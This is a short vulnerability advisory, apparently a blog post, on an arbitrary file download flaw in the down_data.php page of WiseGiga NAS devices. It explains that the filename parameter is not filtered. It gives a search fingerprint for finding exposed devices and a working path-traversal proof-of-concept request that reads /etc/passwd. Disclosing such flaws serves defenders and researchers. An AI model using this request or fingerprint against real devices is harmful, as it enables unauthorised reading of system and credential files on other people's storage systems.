Wisegiga Nas Down_data Php Arbitrary File Download Vulnerability
Wisegiga Nas Down_data Php Arbitrary File Download Vulnerability
WiseGiga NAS down_data.php Arbitrary file download vulnerability
Vulnerability Description
There is a vulnerability to download any file in WISEGIGA NAS down_data.php. Because the filename parameter of the /down_data.php page is not filtered strictly, system-sensitive files can be read.
Vulnerability Impact
WiseGiga NAS
Network surveying and mapping
app=”WISEGIGA-NAS”
Vulnerability reappears
Main page
Verify POC
1
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.